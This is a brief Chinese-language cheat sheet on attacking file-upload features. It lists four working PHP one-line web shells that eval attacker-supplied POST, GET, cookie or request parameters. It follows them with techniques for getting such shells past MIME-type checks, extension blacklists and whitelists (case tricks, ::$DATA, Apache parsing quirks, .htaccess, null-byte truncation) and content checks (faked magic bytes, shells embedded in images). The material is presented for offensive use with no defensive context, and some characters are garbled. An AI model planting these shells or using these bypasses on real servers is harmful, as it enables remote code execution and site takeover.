一、按数据传输方式划分的一句话木马类型1.POST型?php eval($_POST[cmd]);?2.GET型?php eval($_GET[cmd]);?3.Cookie型?php eval($_COOKIE[cmd]);?4.混合型?php eval($_REQUEST[cmd]);?二、绕过MIME类型文件格式检测原理检测Content-Type字段的值方法可以用bp修改Content-Type类型绕过常见MIME类型1、文本类* text/plain 纯文本* text/html HTML* text/css CSS* text/javascript JS* application/json JSON* application/xml XML* application/pdf PDF2、图片类* image/jpeg jpg / jpeg* image/png png* image/gif gif* image/webp webp* image/svgxml svg* image/bmp bmp* image/x-icon ico3、音视频类* audio/mpeg mp3* audio/wav wav* audio/ogg ogg* video/mp4 mp4* video/mpeg mpeg* video/webm webm* video/quicktime mov三、绕过文件后缀检测-黑名单原理文件后缀不能在黑名单中方法1.后缀大小写绕过(.Php)2.空格绕过(.php )3.点绕过(.php.)4.::$DATA绕过(.php::$DATA)Windows NTFS 文件系统中,在处理文件路径时会自动忽略 路径末尾的 ::$DATA5.配合Apache解析漏洞Apache解析有一个特点解析文件时从右往左判断如果为不可识别解析再往左判断如aa.php.owf.rar会被解析为aa.php6.上传一个自定义的.htaccess四、绕过文件后缀检测-白名单原理文件后缀不能在白名单中即为不合法方法1.%00截断2.0x00截断五、绕过文件内容检测1.修改文件幻数通常判断前10个字节2.图片渲染找一个空白区填充一句话木马3.二次渲染攻击文件加载器自身溢出攻击